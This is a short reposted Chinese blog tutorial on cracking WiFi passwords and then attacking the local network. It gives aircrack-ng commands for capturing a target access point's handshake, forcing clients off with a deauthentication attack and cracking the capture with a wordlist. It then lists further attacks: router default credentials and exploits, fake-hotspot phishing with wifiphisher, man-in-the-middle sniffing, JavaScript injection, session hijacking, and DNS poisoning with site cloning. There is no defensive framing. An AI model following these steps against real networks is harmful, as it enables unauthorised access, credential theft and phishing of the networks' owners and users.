zoukankan      html  css  js  c++  java
  • wifi破解到局域网渗透

    本文转自 _博客

    一,密码破解

    wifi破解最主要的还是抓握手包破解(不要给我说某某钥匙的“分享”)。

    wifi认证主要分为四步:

    1,无线客户端与ap连接时,首先发送一个认证请求包

    2,ap收到请求后发送一段信息给客户端

    3,客户端将信息加密后交给ap

    4,ap检查加密结果是否正确,正确则连接,反之否。

    破解步骤(以aircrack-ng为例子):

    1,将无线网卡打开至监听模式:

    airmon-ng start wlan0

    root@kali: ~-wifi-crack_006

    2,探测无线网络:

    airodump-ng mon0

    root@kali: ~-wifi-crack_008

    3,选择要破解的路由器

    airodump-ng -c 信道号 –bssid ap的mac -w 保存的包名 mon0root@kali: ~-wifi-crack_009

    4,发送deauth攻击,使客户端断开ap,然后自动重连,方便抓取握手包

    aireplay-ng -0 10 -a ap的mac -c 客户端的mac –ignore-negative-one mon0

    root@kali: ~-wifi-crack_010

    5,破解

    aircrack-ng -w 字典 之前保存的包名

    root@kali: ~-wifi-crack_011

    也可以使用fern-wifi-cracker这个python写的图形化傻瓜式一键破解工具。

    Fern WIFI Cracker_012

    二,局域网渗透

    1,还是路由器

    知道了wifi密码还不够,还需要得到拨号帐号密码。

    a)默认的帐号密码

    b)路由器漏洞 routerpwn

    c)基础认证钓鱼 http://www.qq2b.net/archives/213.html
    wifiphiser :伪造热点,并且弹出一个路由器升级提示页面,让你输入密码

    2,中间人攻击

    局域网不用像内网域渗透那样小心翼翼

    1)dsploit,cain,ettercap等工具

    注入js钓鱼,嗅探密码,下载替换,会话劫持,dns毒化等等配合社工效果更佳。特别细化dns毒化+set工具包的站点克隆。

  • 相关阅读:
    一天一个shell实例(1)文本中n个出现频率最高的单词(转)
    JNDI全攻略(一)(转)
    JNDI 学习(转)
    JNDI全攻略(二)(转)
    C#开发系列 文章索引
    AppControls
    JSF系列 文章索引
    [转载]DELPHI组件安装全攻略
    什么是有价值的人生
    [转载]InnoSetup5.2.3啊风增强版 安装代码
  • 原文地址:https://www.cnblogs.com/dongchi/p/5170191.html
Copyright © 2011-2022 走看看